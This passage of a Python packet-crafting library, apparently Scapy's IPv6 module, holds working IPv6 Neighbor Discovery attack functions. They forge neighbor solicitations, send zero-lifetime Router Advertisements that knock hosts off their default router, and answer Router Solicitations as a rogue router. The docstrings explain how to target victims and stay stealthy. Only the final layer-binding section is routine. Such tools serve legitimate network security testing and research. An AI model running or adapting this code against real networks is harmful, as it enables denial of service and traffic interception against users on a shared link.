an address associated with the emitting interface will be used
|
(based on the destination address of the packet).
|
|
target: the target address of the NS packet. If no value is provided,
|
a dummy address (2001:db8::1) is used. The value of the target
|
has a direct impact on the destination address of the packet if it
|
is not overridden. By default, the solicited-node multicast address
|
associated with the target is used as destination address of the
|
packet. Consider specifying a specific destination address if you
|
intend to use a target address different than the one of the victim.
|
|
dst: The destination address of the NS. By default, the solicited node
|
multicast address associated with the target address (see previous
|
parameter) is used if no specific value is provided. The victim
|
is not expected to check the destination address of the packet,
|
so using a multicast address like ff02::1 should work if you want
|
the attack to target all hosts on the link. On the contrary, if
|
you want to be more stealth, you should provide the target address
|
for this parameter in order for the packet to be sent only to the
|
victim.
|
|
src_mac: the MAC address used as source of the packet. By default, this
|
is the address of the interface. If you want to be more stealth,
|
feel free to use something else. Note that this address is not the
|
that the victim will use to populate its neighbor cache.
|
|
dst_mac: The MAC address used as destination address of the packet. If
|
the IPv6 destination address is multicast (all-nodes, solicited
|
node, ...), it will be computed. If the destination address is
|
unicast, a neighbor solicitation will be performed to get the
|
associated address. If you want the attack to be stealth, you
|
can provide the MAC address using this parameter.
|
|
loop: By default, this parameter is True, indicating that NS packets
|
will be sent in loop, separated by 'inter' seconds (see below).
|
When set to False, a single packet is sent.
|
|
inter: When loop parameter is True (the default), this parameter provides
|
the interval in seconds used for sending NS packets.
|
|
iface: to force the sending interface.
|
"""
|
|
if not iface:
|
iface = conf.iface
|
|
# Use provided MAC address as source link-layer address option
|
# or the MAC address of the interface if none is provided.
|
if not src_lladdr:
|
src_lladdr = get_if_hwaddr(iface)
|
|
# Prepare packets parameters
|
ether_params = {}
|
if src_mac:
|
ether_params["src"] = src_mac
|
|
if dst_mac:
|
ether_params["dst"] = dst_mac
|
|
ipv6_params = {}
|
if src:
|
ipv6_params["src"] = src
|
if dst:
|
ipv6_params["dst"] = dst
|
else:
|
# Compute the solicited-node multicast address
|
# associated with the target address.
|
tmp = inet_ntop(socket.AF_INET6,
|
in6_getnsma(inet_pton(socket.AF_INET6, target)))
|
ipv6_params["dst"] = tmp
|
|
pkt = Ether(**ether_params)
|
pkt /= IPv6(**ipv6_params)
|
pkt /= ICMPv6ND_NS(tgt=target)
|
pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr)
|
|
sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0)
|
|
|
def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None,
|
ip_src_filter=None, reply_mac=None,
|
tgt_mac=None):
|
"""
|
The purpose of the function is to monitor incoming RA messages
|
sent by default routers (RA with a non-zero Router Lifetime values)
|
and invalidate them by immediately replying with fake RA messages
|
advertising a zero Router Lifetime value.
|
|
The result on receivers is that the router is immediately invalidated,
|
i.e. the associated entry is discarded from the default router list
|
and destination cache is updated to reflect the change.
|
|
By default, the function considers all RA messages with a non-zero
|
Router Lifetime value but provides configuration knobs to allow
|
filtering RA sent by specific routers (Ethernet source address).
|
With regard to emission, the multicast all-nodes address is used
|
by default but a specific target can be used, in order for the DoS to
|
apply only to a specific host.
|
|
More precisely, following arguments can be used to change the behavior:
|
|
iface: a specific interface (e.g. "eth0") of the system on which the
|
DoS should be launched. If None is provided conf.iface is used.
|
|
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
|
Only RA messages received from this source will trigger replies.
|
If other default routers advertised their presence on the link,
|
their clients will not be impacted by the attack. The default
|
value is None: the DoS is not limited to a specific mac address.
|
|
ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
|
on. Only RA messages received from this source address will trigger
|
replies. If other default routers advertised their presence on the
|
link, their clients will not be impacted by the attack. The default
|
value is None: the DoS is not limited to a specific IPv6 source
|
address.
|
|
reply_mac: allow specifying a specific source mac address for the reply,
|
i.e. to prevent the use of the mac address of the interface.
|
|
tgt_mac: allow limiting the effect of the DoS to a specific host,
|
by sending the "invalidating RA" only to its mac address.
|
"""
|
|
def is_request(req, mac_src_filter, ip_src_filter):
|
"""
|
Check if packet req is a request
|
"""
|
|
if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req):
|
return 0
|
|
mac_src = req[Ether].src
|
if mac_src_filter and mac_src != mac_src_filter:
|
return 0
|
|
ip_src = req[IPv6].src
|
if ip_src_filter and ip_src != ip_src_filter:
|
return 0
|
|
# Check if this is an advertisement for a Default Router
|
# by looking at Router Lifetime value
|
if req[ICMPv6ND_RA].routerlifetime == 0:
|
return 0
|
|
return 1
|
|
def ra_reply_callback(req, reply_mac, tgt_mac, iface):
|
"""
|
Callback that sends an RA with a 0 lifetime
|
"""
|
|
# Let's build a reply and send it
|
|
src = req[IPv6].src
|
|
# Prepare packets parameters
|
ether_params = {}
|
if reply_mac:
|
ether_params["src"] = reply_mac
|
|
if tgt_mac:
|
ether_params["dst"] = tgt_mac
|
|
# Basis of fake RA (high pref, zero lifetime)
|
rep = Ether(**ether_params)/IPv6(src=src, dst="ff02::1")
|
rep /= ICMPv6ND_RA(prf=1, routerlifetime=0)
|
|
# Add it a PIO from the request ...
|
tmp = req
|
while ICMPv6NDOptPrefixInfo in tmp:
|
pio = tmp[ICMPv6NDOptPrefixInfo]
|
tmp = pio.payload
|
del(pio.payload)
|
rep /= pio
|
|
# ... and source link layer address option
|
if ICMPv6NDOptSrcLLAddr in req:
|
mac = req[ICMPv6NDOptSrcLLAddr].lladdr
|
else:
|
mac = req[Ether].src
|
rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac)
|
|
sendp(rep, iface=iface, verbose=0)
|
|
print("Fake RA sent with source address %s" % src)
|
|
|
if not iface:
|
iface = conf.iface
|
# To prevent sniffing our own traffic
|
if not reply_mac:
|
reply_mac = get_if_hwaddr(iface)
|
sniff_filter = "icmp6 and not ether src %s" % reply_mac
|
|
sniff(store=0,
|
filter=sniff_filter,
|
lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
|
prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface),
|
iface=iface)
|
|
|
def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None,
|
ip_src_filter=None):
|
"""
|
The purpose of this function is to send provided RA message at layer 2
|
(i.e. providing a packet starting with IPv6 will not work) in response
|
to received RS messages. In the end, the function is a simple wrapper
|
around sendp() that monitor the link for RS messages.
|
|
It is probably better explained with an example:
|
|
>>> ra = Ether()/IPv6()/ICMPv6ND_RA()
|
>>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
|
>>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64)
|
>>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
|
>>> NDP_Attack_Fake_Router(ra, iface="eth0")
|
Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573
|
Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae
|
...
|
|
Following arguments can be used to change the behavior:
|
|
ra: the RA message to send in response to received RS message.
|
|
iface: a specific interface (e.g. "eth0") of the system on which the
|
DoS should be launched. If none is provided, conf.iface is
|
used.
|
|
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
|
Only RS messages received from this source will trigger a reply.
|
Note that no changes to provided RA is done which imply that if
|
you intend to target only the source of the RS using this option,
|
you will have to set the Ethernet destination address to the same
|
value in your RA.
|
The default value for this parameter is None: no filtering on the
|
source of RS is done.
|
|
ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
|
on. Only RS messages received from this source address will trigger
|
replies. Same comment as for previous argument apply: if you use
|
the option, you will probably want to set a specific Ethernet
|
destination address in the RA.
|
"""
|
|
def is_request(req, mac_src_filter, ip_src_filter):
|
"""
|
Check if packet req is a request
|
"""
|
|
if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req):
|
return 0
|
|
mac_src = req[Ether].src
|
if mac_src_filter and mac_src != mac_src_filter:
|
return 0
|
|
ip_src = req[IPv6].src
|
if ip_src_filter and ip_src != ip_src_filter:
|
return 0
|
|
return 1
|
|
def ra_reply_callback(req, iface):
|
"""
|
Callback that sends an RA in reply to an RS
|
"""
|
|
src = req[IPv6].src
|
sendp(ra, iface=iface, verbose=0)
|
print("Fake RA sent in response to RS from %s" % src)
|
|
if not iface:
|
iface = conf.iface
|
sniff_filter = "icmp6"
|
|
sniff(store=0,
|
filter=sniff_filter,
|
lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
|
prn=lambda x: ra_reply_callback(x, iface),
|
iface=iface)
|
|
|
#############################################################################
|
#############################################################################
|
### Layers binding ###
|
#############################################################################
|
#############################################################################
|
|
conf.l3types.register(ETH_P_IPV6, IPv6)
|
conf.l2types.register(31, IPv6)
|
conf.l2types.register(DLT_IPV6, IPv6)
|
conf.l2types.register(DLT_RAW, _IPv46)
|
conf.l2types.register_num2layer(DLT_RAW_ALT, _IPv46)
|
|
bind_layers(Ether, IPv6, type = 0x86dd )
|
bind_layers(CookedLinux, IPv6, proto = 0x86dd )
|
bind_layers(GRE, IPv6, proto = 0x86dd )
|
bind_layers(SNAP, IPv6, code = 0x86dd )
|
bind_layers(Loopback, IPv6, type = 0x1c )
|
bind_layers(IPerror6, TCPerror, nh = socket.IPPROTO_TCP )
|
bind_layers(IPerror6, UDPerror, nh = socket.IPPROTO_UDP )
|
bind_layers(IPv6, TCP, nh = socket.IPPROTO_TCP )
|
bind_layers(IPv6, UDP, nh = socket.IPPROTO_UDP )
|
bind_layers(IP, IPv6, proto = socket.IPPROTO_IPV6 )
|
bind_layers(IPv6, IPv6, nh = socket.IPPROTO_IPV6 )
|
bind_layers(IPv6, IP, nh = socket.IPPROTO_IPIP )
|
bind_layers(IPv6, GRE, nh = socket.IPPROTO_GRE )
|